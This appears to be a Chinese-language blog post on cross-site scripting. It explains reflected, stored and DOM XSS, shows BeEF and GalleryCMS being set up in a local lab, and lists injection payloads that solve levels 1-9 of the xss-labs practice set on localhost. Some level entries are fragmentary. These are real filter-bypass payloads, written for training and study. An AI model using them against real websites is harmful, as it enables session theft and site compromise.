xss总结

xss跨站脚本攻击,(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS

类型一:反射型

特点:

1非持久型,不保存到正常的服务器数据库在中

2反射型xss的被攻击对象是特定的,使用含有反射型xss的特质url

类型二:储存型

特点:

1持久型,攻击脚本将被永久的存放在目标服务器的数据库或文件中,具有很高的隐蔽性

2储存型xss非特定攻击用户,攻击者将存储型xss代码写进有xss的网站上后,只要有访问这个连接就会被攻击

类型三:dom型

特点: 反射型xss和存储型xss会与后台交互,DOM型xss的实现过程都是在前台

DOM(Document Object Model),是一种文档对象模型,DOM通常用于代表在HTML、XHTML和XML中的对象,使用DOM可以允许程序和脚本动态地访问和更新文档的内容、结构和样式,本质就是一种树状的模型。 DOM型XSS是基于DOM文档对象模型的一种漏洞,所以受客户端浏览器的脚本代码所影响,而不是想前面两种会与服务器交互(不是解析,是交互)。 DOM型XSS是取决于输出的位置,并不取决于输出环境,因此也可以说DOM型XSS既有可能是反射型的,也有可能是存储型的,就是说它的输出点是在DOM位置上。

复现20字符短域名绕过

一、安装BEEF

1、在Kali中运行apt install beef-xss

2、运行beef

3、在浏览器访问

二、安装galleryCMS

*遇到一点小问题

在这里插入图片描述

解决方法:手动创建

mysql> create database gallerycms; Query OK, 1 row affected (0.00 sec)

2、点击注册后弹出错误提示

在这里插入图片描述

在这里插入图片描述

Error Number: 1364

Field 'last_ip' doesn't have a default value

INSERT INTO user (email_address, password, is_active, is_admin, created_at, uuid, updated_at) VALUES ('admin@163.com', 'd033e22ae348aeb5660fc2140aec35850c4da997', 1, 1, '2022-07-28 16:25:01', 'c6631386-0e4e-11ed-97c4-0a002700000c', '2022-07-28 16:25:01')

Filename: D:\phpstudy_pro\WWW\GalleryCMS-2.0\system\database\DB_driver.php

Line Number: 330

提示"last_ip"不能为空

解决方法:cmd进入数据库,添加"last_ip"字段,手动插入数据

mysql> use gallerycms; Database changed mysql> INSERT INTO user (email_address, password, is_active, is_admin, created_at, uuid, updated_at,last_ip) VALUES ('admin@163.com', 'd033e22ae348aeb5660fc2140aec35850c4da997', 1, 1, '2022-07-28 16:33:16', 'ed87d8bb-0e4f-11ed-97c4-0a002700000c', '2022-07-28 16:33:16','127.0.0.1'); Query OK, 1 row affected (0.00 sec)

刷新后登录成功进入

在这里插入图片描述

三、开始复现

1、创建一个栏目

在这里插入图片描述

2、准备绕过

<script>标签过长,使用<svg>标签,但也不够

3、缩短域名(域名跳转or重定向国内需要备案)+unicode三合一

℠ expands to sm ㏛ expands to sr st expands to st ㎭ expands to rad ℡ expands to tel

绕过 1级

http://127.0.0.1/xsslabs/level1.php?name=<script>alert(1)</script>

在这里插入图片描述

2级http://127.0.0.1/xsslabs/level2.php?keyword=1"οnclick="alert(1)

在这里插入图片描述

3级

http://127.0.0.1/xsslabs/level3.php?keyword=1'οnclick='alert(1)

4级

http://127.0.0.1/xsslabs/level4.php?keyword=1"οnclick="alert(1)

5级

http://127.0.0.1/xsslabs/level5.php?keyword=1">11111

6级

大小写未过滤【HTML不区分大小写,HTML->JavaScript生效】 http://127.0.0.1/xsslabs/level6.php?keyword=1"Onclick="alert(1)

7级

【双写过滤处】 http://127.0.0.1/xsslabs/level7.php?keyword=1"oonnclick="alert(1)

8级将字符转为ascll码

javascript:alert('1')

javascript:alert('1')

9级跳过过滤(将编码转换ascll)

javascript>>>>>javascript:alert('1

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值